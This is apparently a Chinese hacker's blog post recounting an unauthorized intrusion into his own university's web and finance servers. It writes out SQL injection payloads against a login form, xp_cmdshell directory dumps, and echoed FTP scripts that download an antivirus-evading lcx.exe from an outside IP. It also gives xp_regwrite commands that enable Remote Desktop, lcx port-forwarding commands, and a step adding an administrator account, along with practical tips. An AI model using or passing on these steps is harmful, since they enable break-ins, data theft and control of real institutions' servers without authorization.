感悟：这次入侵我深刻地感觉到了工具的重要性!至于缘何如此感悟，接着看吧~!

                         

　　在本校艰苦的生活了好几年了，临走前对可爱的母校免费来个检测吧!

　　主站很明显是用的动易2006的整站程序，首先看下默认数据库改没，浏览器提交http://www.jnmc.edu.cn/database/powereasy2006.mdb!看到下面这个画面时，

                        

        我欣喜若狂，MS RP 不错! ，顺手敲入默认后台地址，又一次欣喜若狂!!!如图：      心想这也太简单了吧，传说中的网络强人维护的网站会是这样的??但看到这个数据库大小貌似和原版的大小没多大差别，顿时心生悸意，打开后果然不出我所料，数据库是个假的，帐号密码是默认的，但登陆不进，幸好我心脏好，否则哪经得起这大起大落，竟然还会做蜜罐，有搞头喽!!

　　考虑到我们学校是两个校区，分站甚多，于是操起啊d进google一顿狂扫~!未料结果另人抓狂，如图：

                                              

    4000多个结果竟然没有一个注入点，于是把工具抛到一边，自己去站上边溜达边检查，因为有时候工具的误差实在是太大了，所以大家不要太依赖工具~。

　　在站上转了几圈，随便测试了几个asp文件，确实都没注入，于是把目标转向登陆表单或者搜索表单，有个邮箱登陆，

   

    顺手加个单引号，提示请输入用户名，看来引号被过滤了，暂时放弃，继续找，又有个搜索框，但是是动易的，估计没戏，后来溜达到首页下的站内连接上，以下画面映入眼帘，

    尤其是其中那几个字，特别惹眼，财务?莫非和学费有关?顿时来了精神!意淫片刻~!擦干口水继续~!

　　打开后有好几个登陆的地方，随便挑了一个，

                                            

按习惯分别进行了以下测试：

　　

　　综合以上测试可大体推断出源代码大体的sql语句是这种形式：select password from user where username='11' and xmbh='22'，说干就干，开始构造，先测试下权限：select password from user where username='11' and xmbh='22' and (select user)>0;--

                                                          

　　看来很有可能是sa了，打开防火墙，用xp-cmdshell ping下，ok!!防火墙报警，得到对方ip，本来以为到这事情就简单了，构造个url让工具跑就是了，可不幸的是构造url屡次失败，看来与工具无缘了，于是痛苦的过程开始了，于是有了以下思路：1：建个sysadmin权限的sql用户，起码可以避免烦琐的读回显

　　2：建个系统用户，直接3389登陆

　　3：用tftp或down.vbs下载个反弹木马来突破防火墙

　　实践： telnet 对方ip 1433失败，在内网!防火墙存在!!前两种思路立马枪毙!用tftp连本机下载上兴，失败，我这边一直监听着69(tftp端口)，没反映!然后立刻准备用echo 写个down.vbs，本机架了个ftpserver，九牛二虎之后，xp-cmdshell下运行down.vbs下载，本地端口仍没反映，难道有杀软?于是依次执行下面语句：

　　22';create table rebeyond (id nvarchar(255), num2 nvarchar(255),num3 nvarchar (255));--

　　22';insert into rebeyond (id) exec master.dbo.xp_cmdshell 'dir c:\';--

　　22' and (select top 1 id from wokao)>0—依次暴目录，暴出了瑞星的目录，确定了杀软是瑞星，确定杀软可为以后免杀备用。注：此处挨个暴目录的过程只能用四个字形容：另人崩溃!

　　Down.vbs思路和反弹木马思路报销!此时想到了内网端口转发和经典的ftp命令，于是飞快写了两个文件，ftp.aa　ftp.bat;

　　前者内容：open 222.134.191.182后者内容：ftp -s:ftp.aa,执行后者批处理文件即可完成下载，

　　abc

　　abc

　　get lcx.exe

　　bye

　　exit

　　写完后三下五除二便对lcx.exe进行免杀，免杀目标：瑞星2008，片刻后开始echo向服务器提交那两个文件：

　　echo open 222.134.191.182>c:\windows\system32\ftp.aa

　　echo abc>>c:\windows\system32\ftp.aa

　　echo abc>>c:\windows\system32\ftp.aa

　　echo get lcx.exe c:\lcx.exe>>c:\windows\system32\ftp.aa

　　echo bye>>c:\windows\system32\ftp.aa

　　echo exit>>c:\windows\system32\ftp.aa(切记：①大家以后再用这个方法的时候，千万别在”>>”前面加空格，我就是因为习惯性的加了个空格，搞得老是ftp密码错误(通过把执行结果插到临时表里得知的)，害得我翻了n遍工。②因为xp-cmdshell在调用时shell的路径默认是系统目录的，所以最好echo到系统目录，我就是由于图省事刚开始全放到c盘根目录了，此处又导致我翻了n遍工，所以我决定要把这个虽然没什么技术含量，但是却很艰辛的入侵过程写下来)

　　接下来xp-cmdshel执行ftp.bat，然后再重复刚才上面那个建表，插表，暴表的过程，这过程极其容易另人吐血，看下面我暴目录检查lcx.exe是否下载成功时写的这个就知道了。

　　上面那片可是一行写下来的!!汗一个!!成功暴出lcx。如图：

，然后netstat –an发现没3389，刚开始怀疑改了端口，也懒得再从regedit读端口了，直接改!反正我有xp-cmdshell，执行下面三行是给对方开3389：

　　1Exec　master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0—

　　2exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp','PortNumber','REG_DWORD',3389—

　　3exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber','REG_DWORD',3389—

　　继续收尾，本地执行：lcx.exe -listen 51 3388

　　Xp_cmdshell执行：lcx.exe -slave 我的ip 51 127.0.0.1 3389，并建立用户加入管理组，然后连接本机3388端口：127.0.0.1:3388,登陆!如图：

    至此服务器拿下!整个入侵过程完毕，渗透过程我还没来得及做，就先不写了，本文没什么技术含量，主要是这次入侵的太枯燥和辛苦了，于是就决定写篇文章记录下来，高手莫笑啊!困死了，去睡觉!!